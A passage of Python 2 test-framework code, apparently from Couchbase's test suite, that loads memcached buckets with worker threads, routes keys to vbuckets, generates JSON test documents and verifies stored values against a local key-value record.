if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
#let's assume overhead per key is 64 bytes ?
how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] /= int(number_of_threads)
#at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
#we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi)
#we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size / len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def random_pick(list):
if list:
if len(list) > 1:
return list[Random().randint(0, len(list) - 1)]
return list[0]
#raise array empty ?
return None
@staticmethod
def direct_client(server, bucket, timeout=30):
log = lib.logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
client.vbucket_count = len(vBuckets)
bucket_info = rest.get_bucket(bucket)
#todo raise exception for not bucket_info
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False):
#for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params\
and TestInputSingleton.input.test_params["ascii"].lower() == "true")\
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, bucket_info.port, bucket))
client = MemcachedAsciiClient(server.ip, bucket_info.port, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], node.moxi, bucket))
client = MemcachedClient(server["ip"], node.moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, node.moxi, bucket))
client = MemcachedClient(server.ip, node.moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def flush_bucket(server, bucket):
#if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
client = MemcachedClientHelper.direct_client(server, bucket)
retry_attempt = 5
while retry_attempt > 0:
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log = logger.Logger.get_logger()
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
client.close()
return
class MutationThread(threading.Thread):
def run(self):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default'):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'])
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key)
except Exception:
self._saw_error(key)
# self.log.warn("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
#mutation ? let' do two cycles , first run and then try to mutate all those itesm
#and return
class WorkerThread(threading.Thread):
#too flags : stop after x errors
#slow down after every seeing y errors
#value_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
#let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
#smart functin that gives you sth you can use to
#get inserted keys
#we should just expose an iterator instead which
#generates the key,values on fly
def keys_set(self):
#let's construct the inserted keys set
#TODO: hard limit , let's only populated up to 1 million keys
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
try:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
#keeping keys in the memory is not such a good idea because
#we run out of memory so best is to just keep a counter ?
#if someone asks for the keys we can give them the formula which is
# baseuuid-{0}-{1} , size and counter , which is between n-0 except those
#keys which were rejected
#let's print out some status every 5 minutes..
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
#every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
#vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = selected["value"].next()
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value)
else:
client.set(key, 0, 0, value)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
#vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
#before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"])
else:
client.set(item["key"], 0, 0, item["value"])
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
retry = - 1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
#if error is memcached error oom related let's do a sleep
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
def reset(self, rest=None):
m, v, r = self.request_map(rest or RestConnection(self.info), self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
def reset_vbucket(self, rest, key):
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
forward_map = rest.get_bucket(self.bucket).forward_map
if not forward_map:
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucketId == vBucket.id:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.split(":")[0]
masterPort = int(vBucket.master.split(":")[1])
if self.vBucketMap[vBucketId] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
self.log.info("Recevied forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket)
# if no one is using that memcached connection anymore just close the connection
used_nodes = set([self.vBucketMap[vb_name] for vb_name in self.vBucketMap])
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
return True
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket):
if not server_str in memcacheds:
serverIp = server_str.split(":")[0]
serverPort = int(server_str.split(":")[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
server.port = node.port
memcacheds[server_str] =\
MemcachedClientHelper.direct_client(server, bucket)
break
except Exception as ex:
msg = "unable to establish connection to {0}.cleanup open connections"
self.log.warn(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None):
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key):
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
def set(self, key, exp, flags, value):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).set, key, exp, flags, value)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
if "Got empty data (remote died?)" in error.message or \
"Timeout waiting for socket send." in error.message \
and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def get(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
if "Got empty data (remote died?)" in error.message or \
"Timeout waiting for socket send." in error.message \
and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def delete(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
if "Got empty data (remote died?)" in error.message or \
"Timeout waiting for socket send." in error.message \
and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def _send_op(self, func, *args):
backoff = .001
while True:
try:
return func(*args)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
except EOFError, IOError:
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset")
def done(self):
[self.memcacheds[ip].close() for ip in self.memcacheds]
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store = None, info=None, store_enabled = True):
VBucketAwareMemcached.__init__(self, rest, bucket, info)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
def set(self, key, value, ttl = -1):
self._rlock.acquire()
try:
if ttl >= 0:
self.memcached(key).set(key, ttl, 0, value)
else:
self.memcached(key).set(key, 0, 0, value)
if self.store_enabled:
self.kv_store.write(key, hashlib.md5(value).digest(), ttl)
except MemcachedError as e:
self._rlock.release()
raise MemcachedError(e.status, e.msg)
except AssertionError:
self._rlock.release()
raise AssertionError
except:
self._rlock.release()
raise Exception("General Exception from KVStoreAwareSmartClient.set()")
self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
def delete(self, key):
try:
self._rlock.acquire()
opaque, cas, data = self.memcached(key).delete(key)
if self.store_enabled and cas == 0:
self.kv_store.delete(key)
self._rlock.release()
else:
self._rlock.release()
raise MemcachedError(7, "Invalid cas value")
except Exception as e:
self._rlock.release()
raise MemcachedError(7, e)
def get_valid_key(self, key):
return self.get_key_check_status(key, "valid")
def get_deleted_key(self, key):
return self.get_key_check_status(key, "deleted")
def get_expired_key(self, key):
return self.get_key_check_status(key, "expired")
def get_all_keys(self):
return self.kv_store.keys()
def get_all_valid_items(self):
return self.kv_store.valid_items()
def get_all_deleted_items(self):
return self.kv_store.deleted_items()
def get_all_expired_items(self):
return self.kv_store.expired_items()
def get_key_check_status(self, key, status):
item = self.kv_get(key)
if(item is not None and item["status"] == status):
return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
def kv_get(self, key):
item = None
try:
item = self.kv_store.read(key)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
#self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key):
item = self.mc_get_full(key)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key):
item = None
try:
x, y, value = self.memcached(key).get(key)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status)
mc_item = self.mc_get(key)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client):
keys = client.get_all_keys()
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k)
if(valid == False):
validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key):
status = False
msg = ""
item = client.kv_get(key)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key):
kv_item = client.get_valid_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(kv_item is not None and mc_item is not None):
# compare values
if kv_item["value"] == mc_item["value"]:
status = True
else:
msg = "kvstore and memcached values mismatch"
elif(kv_item is None):
msg = "valid status not set in kv_store"
elif(mc_item is None):
msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key):
deleted_kv_item = client.get_deleted_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(deleted_kv_item is not None and mc_item is None):
status = True
elif(deleted_kv_item is None):
msg = "delete status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key):
expired_kv_item = client.get_expired_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(expired_kv_item is not None and mc_item is None):
status = True
elif(expired_kv_item is None):
msg = "exp. status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
def __init__(self, items, kv_template, options=dict(size=1024)):
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def next(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta":{"id": "{0}-{1}".format(i, self._options["seed"])},"json":{}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
#how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
class DocumentGenerator(object):
#will loop over all values in props and replace ${prefix} with ${i}
@staticmethod
def make_docs(items, kv_template, options=dict(size=1024, seed=str(uuid.uuid4()))):
return GeneratedDocuments(items, kv_template, options)
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size / len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def get_doc_generators(count, kv_template = None, seed = None, sizes = None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count / len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio = 1,
value_size_distribution=None,
seed = None):
log = logger.Logger.get_logger()
if ram_load_ratio < 0 :
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
info = rest.get_bucket(bucket)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
doc_seed = seed or str(uuid.uuid4())
kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": doc_seed}
options = {"size": size, "seed": doc_seed}
payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
list.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed' : doc_seed})
return list
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
#Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', user='Administrator',
password='', protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
